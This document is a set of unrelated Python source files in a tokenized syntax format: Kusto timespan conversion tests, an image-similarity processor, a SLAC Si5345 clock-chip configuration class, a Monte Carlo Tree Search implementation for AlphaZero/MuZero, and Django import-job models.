milliseconds=111)<line_sep># Test from Ticks <assert_stmt>to_timedelta(-80080008)<eq>timedelta(microseconds=-8008001)<assert_stmt>to_timedelta(10010001)<eq>timedelta(microseconds=1001000)<block_end><def_stmt>test_to_timestamp_fail self<block_start>""" Sad path to test TimeSpan to timedelta converter """<line_sep>self.assertRaises(ValueError to_timedelta "")<line_sep>self.assertRaises(ValueError to_timedelta "foo")<line_sep>self.assertRaises(ValueError to_timedelta "00")<line_sep>self.assertRaises(ValueError to_timedelta "00:00")<line_sep>self.assertRaises(ValueError to_timedelta "03.00:00:00.")<line_sep>self.assertRaises(ValueError to_timedelta "03.00:00:00.111a")<block_end><def_stmt>test_to_datetime self<block_start>"""Tests datetime read by KustoResultIter"""<assert_stmt>to_datetime("2016-06-07T16:00:00Z")<is><not><none><block_end><def_stmt>test_to_datetime_fail self<block_start>"""Tests that invalid strings fails to convert to datetime"""<line_sep>self.assertRaises(ValueError to_datetime "invalid")<block_end><block_end>
"""Tests for the panel_custom component."""<line_sep>
<import_from_stmt>paz.abstract Processor<import_stmt>numpy<as>np<class_stmt>MakeDictionary(Processor)<block_start><def_stmt>__init__ self encoder renderer<block_start>super(MakeDictionary self).__init__()<line_sep>self.latent_dimension=encoder.encoder.output_shape[1]<line_sep>self.encoder=encoder<line_sep>self.renderer=renderer<block_end><def_stmt>call self<block_start>data=self.renderer.render()<line_sep>dictionary={}<line_sep>latent_vectors=np.zeros((len(data) self.latent_dimension))<for_stmt>sample_arg,sample enumerate(data)<block_start>image=sample['image']<line_sep>latent_vectors[sample_arg]=self.encoder(image)<line_sep>dictionary[sample_arg]=image<block_end>dictionary['latent_vectors']=latent_vectors<line_sep><return>dictionary<block_end><block_end><class_stmt>MeasureSimilarity(Processor)<block_start><def_stmt>__init__ self dictionary measure<block_start>super(MeasureSimilarity self).__init__()<line_sep>self.dictionary=dictionary<line_sep>self.measure=measure<block_end><def_stmt>call self latent_vector<block_start>latent_vectors=self.dictionary['latent_vectors']<line_sep>measurements=self.measure(latent_vectors latent_vector)<line_sep>closest_image=self.dictionary[np.argmax(measurements)]<line_sep><return>latent_vector closest_image<block_end><block_end>
#----------------------------------------------------------------------------- # This file is part of 'SLAC Firmware Standard Library'. # It is subject to the license terms in the LICENSE.txt file found in the # top-level directory of this distribution and at: # https://confluence.slac.stanford.edu/display/ppareg/LICENSE.html. # No part of 'SLAC Firmware Standard Library', including this file, # may be copied, modified, propagated, or distributed except according to # the terms contained in the LICENSE.txt file. #----------------------------------------------------------------------------- <import_stmt>pyrogue<as>pr<import_stmt>surf.devices.silabs<as>silabs<import_stmt>csv<import_stmt>click<import_stmt>fnmatch<import_stmt>rogue<class_stmt>Si5345Lite(pr.Device)<block_start><def_stmt>__init__ self simpleDisplay=<true> advanceUser=<false> liteVersion=<true> **kwargs<block_start>self._useVars=rogue.Version.greaterThanEqual('5.4.0')<if_stmt>self._useVars<block_start>size=0<block_end><else_stmt><block_start>size=(0x1000<lshift>2)<block_end># 16KB super().__init__(size=size **kwargs)<line_sep>self.add(pr.LocalVariable(name="CsvFilePath" description="Used if command's argument is empty" mode="RW" value="" ))<line_sep>############################## # Commands ############################## @self.command(value='' description="Load the .CSV from CBPro." )<def_stmt>LoadCsvFile arg# Check if non-empty argument <block_start><if_stmt>(arg<ne>"")<block_start>path=arg<block_end><else_stmt># Use the variable path instead <block_start>path=self.CsvFilePath.get()<block_end># Check for .csv file <if_stmt>fnmatch.fnmatch(path '*.csv')<block_start>click.secho(f'{self.path}.LoadCsvFile(): {path}' fg='green')<block_end><else_stmt><block_start>click.secho(f'{self.path}.LoadCsvFile(): {path} is not .csv' fg='red')<line_sep><return><block_end># Power down during the configuration load self.Page0.PDN.set(<true>)<line_sep># Open the .CSV file <with_stmt>open(path)<as>csvfile<block_start>reader=csv.reader(csvfile delimiter=',' quoting=csv.QUOTE_NONE)<line_sep># Loop through the rows in the CSV file <for_stmt>row reader<block_start><if_stmt>(row[0]<ne>'Address')<block_start>self._setValue(offset=(int(row[0] 16)<lshift>2) data=int(row[1] 16) )<block_end><block_end><block_end># Update local RemoteVariables and verify conflagration self.readBlocks(recurse=<true>)<line_sep>self.checkBlocks(recurse=<true>)<line_sep># Execute the Page5.BW_UPDATE_PLL command self.Page5.BW_UPDATE_PLL()<line_sep># Power Up after the configuration load self.Page0.PDN.set(<false>)<line_sep># Clear the internal error flags self.Page0.ClearIntErrFlag()<block_end>############################## # Pages ############################## self._pages={0:silabs.Si5345Page0(offset=(0x000<lshift>2) simpleDisplay=simpleDisplay expand=<false>) # 0x0000 - 0x03FF 1:silabs.Si5345Page1(offset=(0x100<lshift>2) simpleDisplay=simpleDisplay expand=<false> hidden=<not>(advanceUser) liteVersion=liteVersion) # 0x0400 - 0x07FF 2:silabs.Si5345Page2(offset=(0x200<lshift>2) simpleDisplay=simpleDisplay expand=<false> hidden=<not>(advanceUser) liteVersion=liteVersion) # 0x0800 - 0x0BFF 3:silabs.Si5345Page3(offset=(0x300<lshift>2) simpleDisplay=simpleDisplay expand=<false> hidden=<not>(advanceUser) liteVersion=liteVersion) # 0x0C00 - 0x0FFF 4:silabs.Si5345Page4(offset=(0x400<lshift>2) simpleDisplay=simpleDisplay expand=<false> hidden=<not>(advanceUser) liteVersion=liteVersion) # 0x1000 - 0x13FF 5:silabs.Si5345Page5(offset=(0x500<lshift>2) simpleDisplay=simpleDisplay expand=<false> hidden=<not>(advanceUser) liteVersion=liteVersion) # 0x1400 - 0x17FF 6:silabs.Si5345PageBase(name='Page6' offset=(0x600<lshift>2) expand=<false> hidden=<not>(advanceUser)) # 0x1800 - 0x1BFF 7:silabs.Si5345PageBase(name='Page7' offset=(0x700<lshift>2) expand=<false> hidden=<not>(advanceUser)) # 0x1C00 - 0x1FFF 8:silabs.Si5345PageBase(name='Page8' offset=(0x800<lshift>2) expand=<false> hidden=<not>(advanceUser)) # 0x2000 - 0x23FF 9:silabs.Si5345Page9(offset=(0x900<lshift>2) simpleDisplay=simpleDisplay expand=<false> hidden=<not>(advanceUser) liteVersion=liteVersion) # 0x2400 - 0x27FF 10:silabs.Si5345PageA(offset=(0xA00<lshift>2) simpleDisplay=simpleDisplay expand=<false> hidden=<not>(advanceUser) liteVersion=liteVersion) # 0x2800 - 0x2BFF 11:silabs.Si5345PageB(offset=(0xB00<lshift>2) simpleDisplay=simpleDisplay expand=<false> hidden=<not>(advanceUser) liteVersion=liteVersion) # 0x2C00 - 0x2FFF }<line_sep># Add Pages <for_stmt>k,v self._pages.items()<block_start>self.add(v)<block_end>self.add(pr.LinkVariable(name='Locked' description='Inverse of LOL' mode='RO' dependencies=[self.Page0.LOL] linkedGet=<lambda>:(<false><if>self.Page0.LOL.value()<else><true>)))<block_end><def_stmt>_setValue self offset data<block_start><if_stmt>self._useVars# Note: index is byte index (not word index) <block_start>self._pages[offset<floordiv>0x400].DataBlock.set(value=data index=(offset%0x400)<rshift>2)<block_end><else_stmt><block_start>self._rawWrite(offset data)<block_end><block_end><block_end># Deprecated
""" Contains logic for performing Monte Carlo Tree Search having access to the environment. The class is an adaptation of AlphaZero-General's MCTS search to accommodate non-adversarial environments (MDPs). We utilize the MinMax scaling of backed-up rewards for the UCB formula and (by default) compute the UCB using the formula proposed by the MuZero algorithm. The MCTS returns both the estimated root-value and action probabilities. The MCTS also discounts backed up rewards given that gamma < 1. Notes: - Adapted from https://github.com/suragnair/alpha-zero-general - Base implementation done. - Documentation 15/11/2020 """<import_stmt>typing<import_stmt>numpy<as>np<import_from_stmt>AlphaZero.AlphaNeuralNet AlphaZeroNeuralNet<import_from_stmt>utils DotDict<import_from_stmt>utils.selfplay_utils MinMaxStats GameHistory GameState<line_sep>EPS=1e-8<class_stmt>MCTS<block_start>""" This class handles the MCTS tree while having access to the environment logic. """<line_sep>CANONICAL:bool=<false># Whether to compute the UCB formula using AlphaZero's formula (true) or MuZero's formula. <def_stmt>__init__ self game neural_net:AlphaZeroNeuralNet args:DotDict<arrow><none><block_start>""" Initialize all requisite variables for performing MCTS for AlphaZero. :param game: Game Implementation of Game class for environment logic. :param neural_net: AlphaNeuralNet Implementation of AlphaNeuralNet class for inference. :param args: DotDict Data structure containing parameters for the tree search. """<line_sep>self.game=game<line_sep>self.neural_net=neural_net<line_sep>self.args=args<line_sep># Static helper variables. self.single_player=game.n_players<eq>1<line_sep>self.action_size=game.getActionSize()<line_sep># Gets reinitialized at every search self.minmax=MinMaxStats(self.args.minimum_reward self.args.maximum_reward)<line_sep>self.Qsa={}# stores Q values for s,a (as defined in the paper) self.Ssa={}# stores state transitions for s, a self.Rsa={}# stores R values for s,a self.Nsa={}# stores #times edge s,a was visited self.Ns={}# stores #times board s was visited self.Ps={}# stores initial policy (returned by neural net) self.Vs={}<block_end># stores game.getValidMoves for board s <def_stmt>clear_tree self<arrow><none><block_start>""" Clear all statistics stored in the current search tree """<line_sep>self.Qsa,self.Ssa,self.Rsa,self.Nsa,self.Ns,self.Ps,self.Vs=[{}<for>_ range(7)]<block_end><def_stmt>initialize_root self state:GameState trajectory:GameHistory<arrow>typing.Tuple[bytes float]<block_start>""" Perform initial inference for the root state and perturb the network prior with Dirichlet noise. Additionally mask the illegal moves in the network prior and initialize all statistics for starting the MCTS search. :param state: GameState Data structure containing the current state of the environment. :param trajectory: GameHistory Data structure containing the entire episode trajectory of the agent(s). :return: tuple (hash, root_value) The hash of the environment state and inferred root-value. """<line_sep>network_input=trajectory.stackObservations(self.neural_net.net_args.observation_length state.observation)<line_sep>pi_0,v_0=self.neural_net.predict(network_input)<line_sep>s_0=self.game.getHash(state)<line_sep># Add Dirichlet Exploration noise noise=np.random.dirichlet([self.args.dirichlet_alpha]<times>len(pi_0))<line_sep>self.Ps[s_0]=noise<times>self.args.exploration_fraction+(1-self.args.exploration_fraction)<times>pi_0<line_sep># Mask the prior for illegal moves, and re-normalize accordingly. self.Vs[s_0]=self.game.getLegalMoves(state)<line_sep>self.Ps[s_0]<augmul>self.Vs[s_0]<line_sep>self.Ps[s_0]=self.Ps[s_0]/np.sum(self.Ps[s_0])<line_sep># Sum of visit counts of the edges/ children and legal moves. self.Ns[s_0]=0<line_sep><return>s_0 v_0<block_end><def_stmt>compute_ucb self s:bytes a:int exploration_factor:float<arrow>float<block_start>""" Compute the UCB for an edge (s, a) within the MCTS tree: PUCT(s, a) = MinMaxNormalize(Q(s, a)) + P(s, a) * sqrt(visits_parent / (1 + visits_s)) * exploration_factor Where the exploration factor is either the exploration term of MuZero (default) or a float c_1. Illegal edges are returned as zeros. The Q values within the tree are MinMax normalized over the accumulated statistics over the current tree search. :param s: hash Key of the current state inside the MCTS tree. :param a: int Action key representing the path to reach the child node from path (s, a) :param exploration_factor: float Pre-computed exploration factor from the MuZero PUCT formula. :return: float Upper confidence bound with neural network prior """<if_stmt>s<in>self.Vs<and><not>self.Vs[s][a]<block_start><return>0<block_end>visit_count=self.Nsa[(s a)]<if>(s a)<in>self.Nsa<else>0<line_sep>q_value=self.minmax.normalize(self.Qsa[(s a)])<if>(s a)<in>self.Qsa<else>0<line_sep>c_children=np.max([self.Ns[s] 1e-8])# Ensure that prior doesn't collapse to 0 if s is new. # Exploration <if_stmt>self.CANONICAL# Standard PUCT formula from the AlphaZero paper <block_start>ucb=self.Ps[s][a]<times>np.sqrt(c_children)/(1+visit_count)<times>self.args.c1<block_end><else_stmt># The PUCT formula from the MuZero paper <block_start>ucb=self.Ps[s][a]<times>np.sqrt(c_children)/(1+visit_count)<times>exploration_factor<block_end>ucb<augadd>q_value# Exploitation <return>ucb<block_end><def_stmt>runMCTS self state:GameState trajectory:GameHistory temp:int=1<arrow>typing.Tuple[np.ndarray float]<block_start>""" This function performs 'num_MCTS_sims' simulations of MCTS starting from the provided root GameState. Before the search we only clear statistics stored inside the MinMax tree. In this way we ensure that reward bounds get refreshed over time/ don't get affected by strong reward scaling in past searches. This implementation, thus, reuses state state transitions from past searches. This may influence memory usage. Our estimation of the root-value of the MCTS tree search is based on a sample average of each backed-up MCTS value. This means that this estimate represents an on-policy estimate V^pi. Illegal moves are masked before computing the action probabilities. :param state: GameState Data structure containing the current state of the environment. :param trajectory: GameHistory Data structure containing the entire episode trajectory of the agent(s). :param temp: float Visit count exponentiation factor. A value of 0 = Greedy, +infinity = uniformly random. :return: tuple (pi, v) The move probabilities of MCTS and the estimated root-value of the policy. """<line_sep># Refresh value bounds in the tree self.minmax.refresh()<line_sep># Initialize the root variables needed for MCTS. s_0,v_0=self.initialize_root(state trajectory)<line_sep># Aggregate root state value over MCTS back-propagated values v_search=sum([self._search(state trajectory)<for>_ range(self.args.num_MCTS_sims-1)])<line_sep>v=(v_0+(v_search<if>self.single_player<else>-v_search))/self.args.num_MCTS_sims<line_sep># MCTS Visit count array for each edge 'a' from root node 's_0'. counts=np.array([self.Nsa[(s_0 a)]<if>(s_0 a)<in>self.Nsa<else>0<for>a range(self.action_size)])<if_stmt>temp<eq>0# Greedy selection. One hot encode the most visited paths (randomly break ties). <block_start>move_probabilities=np.zeros(len(counts))<line_sep>move_probabilities[np.argmax(counts+np.random.randn(len(counts))<times>1e-8)]=1<block_end><else_stmt><block_start>counts=np.power(counts 1./temp)<line_sep>move_probabilities=counts/np.sum(counts)<block_end><return>move_probabilities v<block_end><def_stmt>_search self state:GameState trajectory:GameHistory path:typing.Tuple[int <ellipsis>]=tuple()<arrow>float<block_start>""" Recursively perform MCTS search inside the actual environments with search-paths guided by the PUCT formula. Selection chooses an action for expanding/ traversing the edge (s, a) within the tree search. The exploration_factor for the PUCT formula is computed within this function for efficiency: exploration_factor = c1 * log(visits_s + c2 + 1) - log(c2) Setting AlphaMCTS.CANONICAL to true sets exploration_factor just to c1. If an edge is expanded, we perform a step within the environment (with action a) and observe the state transition, reward, and infer the new move probabilities, and state value. If an edge is traversed, we simply look up earlier inferred/ observed values from the class dictionaries. During backup we update the current value estimates of an edge Q(s, a) using an average, we additionally update the MinMax statistics to get reward/ value boundaries for the PUCT formula. Note that backed-up values get discounted for gamma < 1. For adversarial games, we negate the backed up value G_k at each backup. The actual search-path 'path' is kept as a debugging-variable, it currently has no practical use. This method may raise a recursion error if the environment creates cycles, this should be highly improbable for most environments. If this does occur, the environment can be altered to terminate after n visits to some cycle. :param state: GameState Numerical prediction of the state by the encoder/ dynamics model. :param trajectory: GameHistory Data structure containing all observations until the current search-depth. :param path: tuple of integers representing the tree search-path of the current function call. :return: float The backed-up discounted/ Monte-Carlo returns (dependent on gamma) of the tree search. :raises RecursionError: When cycles occur within the search path, the search can get stuck *ad infinitum*. """<line_sep>s=self.game.getHash(state)<line_sep>### SELECTION # pick the action with the highest upper confidence bound exploration_factor=self.args.c1+np.log(self.Ns[s]+self.args.c2+1)-np.log(self.args.c2)<line_sep>confidence_bounds=np.asarray([self.compute_ucb(s a exploration_factor)<for>a range(self.action_size)])<line_sep>a=np.flatnonzero(self.Vs[s])[np.argmax(confidence_bounds[self.Vs[s].astype(bool)])]# Get masked argmax. # Default leaf node value. Future possible future reward is 0. Variable is overwritten if edge is non-terminal. value=0<if_stmt>(s a)<not><in>self.Ssa### ROLLOUT for valid moves <block_start>next_state,reward=self.game.getNextState(state a clone=<true>)<line_sep>s_next=self.game.getHash(next_state)<line_sep># Transition statistics. self.Rsa[(s a)],self.Ssa[(s a)],self.Ns[s_next]=reward next_state 0<line_sep># Inference for non-terminal nodes. <if_stmt><not>next_state.done# Build network input for inference. <block_start>network_input=trajectory.stackObservations(self.neural_net.net_args.observation_length state.observation)<line_sep>prior,value=self.neural_net.predict(network_input)<line_sep># Inference statistics. Alternate value perspective due to adversary (model predicts for next player). self.Ps[s_next],self.Vs[s_next]=prior self.game.getLegalMoves(next_state)<line_sep>value=value<if>self.single_player<else>-value<block_end><block_end><elif_stmt><not>self.Ssa[(s a)].done### EXPANSION <block_start>trajectory.observations.append(state.observation)# Build up an observation trajectory inside the tree value=self._search(self.Ssa[(s a)] trajectory path+(a ))<line_sep>trajectory.observations.pop()# Clear tree observation trajectory when backing up <block_end>### BACKUP gk=self.Rsa[(s a)]+self.args.gamma<times>value# (Discounted) Value of the current node <if_stmt>(s a)<in>self.Qsa<block_start>self.Qsa[(s a)]=(self.Nsa[(s a)]<times>self.Qsa[(s a)]+gk)/(self.Nsa[(s a)]+1)<line_sep>self.Nsa[(s a)]<augadd>1<block_end><else_stmt><block_start>self.Qsa[(s a)]=gk<line_sep>self.Nsa[(s a)]=1<block_end>self.minmax.update(self.Qsa[(s a)])<line_sep>self.Ns[s]<augadd>1<line_sep><return>gk<if>self.single_player<else>-gk<block_end><block_end>
<import_stmt>functools<import_stmt>operator<import_from_stmt>optimus.engines.base.cudf.rows CUDFBaseRows<import_stmt>cudf<import_stmt>pandas<as>pd<import_from_stmt>optimus.engines.base.dataframe.rows DataFrameBaseRows<import_from_stmt>optimus.engines.base.cudf.rows CUDFBaseRows<import_from_stmt>optimus.engines.base.rows BaseRows<class_stmt>Rows(DataFrameBaseRows CUDFBaseRows BaseRows)<block_start><pass><block_end>
<import_stmt>global_init<as>gi<line_sep>XX=[gi.aa() 3]<line_sep>#pythran export bb() <def_stmt>bb <block_start><return>XX<block_end>
""" See the module-level docstring for implementation details """<import_from_stmt>django.core.validators MinValueValidator<import_from_stmt>django.db models<line_sep># FIXME: these classes should have names which more accurately represent what they do <class_stmt>TaskStatusModel(models.Model)<block_start>created=models.DateTimeField(auto_now_add=<true>)<line_sep>modified=models.DateTimeField(auto_now=<true>)<line_sep>last_started=models.DateTimeField(help_text="Last time when a worker started processing this job" null=<true> blank=<true> )<line_sep>completed=models.DateTimeField(help_text="Time when the job completed without error" null=<true> blank=<true>)<line_sep>failed=models.DateTimeField(help_text="Time when the job failed due to an error" null=<true> blank=<true>)<line_sep>status=models.TextField(help_text="Status message, if any, from the last worker" blank=<true> default="")<line_sep>task_id=models.UUIDField(help_text="UUID of the last Celery task to process this record" null=<true> blank=<true> )<class_stmt>Meta<block_start>abstract=<true><block_end><block_end><class_stmt>ImportJob(TaskStatusModel)<block_start>""" Represents a request by a user to import item(s) from a remote URL """<line_sep>created_by=models.ForeignKey("auth.User" null=<true> on_delete=models.SET_NULL)<line_sep>project=models.ForeignKey("concordia.Project" on_delete=models.CASCADE)<line_sep>url=models.URLField(verbose_name="Source URL for the entire job")<def_stmt>__str__ self<block_start><return>"ImportJob(created_by=%s, project=%s, url=%s)"%(self.created_by.username self.project.title self.url )<block_end><block_end><class_stmt>ImportItem(TaskStatusModel)<block_start>""" Record of the task status for each Item being imported """<line_sep>job=models.ForeignKey(ImportJob on_delete=models.CASCADE related_name="items")<line_sep>url=models.URLField()<line_sep>item=models.ForeignKey("concordia.Item" on_delete=models.CASCADE)<class_stmt>Meta<block_start>unique_together=(("job" "item") )<block_end><def_stmt>__str__ self<block_start><return>"ImportItem(job=%s, url=%s)"%(self.job self.url)<block_end><block_end><class_stmt>ImportItemAsset(TaskStatusModel)<block_start>""" Record of the task status for each Asset being imported """<line_sep>import_item=models.ForeignKey(ImportItem on_delete=models.CASCADE related_name="assets")<line_sep>url=models.URLField()<line_sep>sequence_number=models.PositiveIntegerField(validators=[MinValueValidator(1)])<line_sep>asset=models.ForeignKey("concordia.Asset" on_delete=models.CASCADE)<class_stmt>Meta<block_start>unique_together=(("import_item" "sequence_number") ("import_item" "asset"))<block_end><def_stmt>__str__ self<block_start><return>"ImportItemAsset(import_item=%s, url=%s)"%(self.import_item self.url)<block_end><block_end>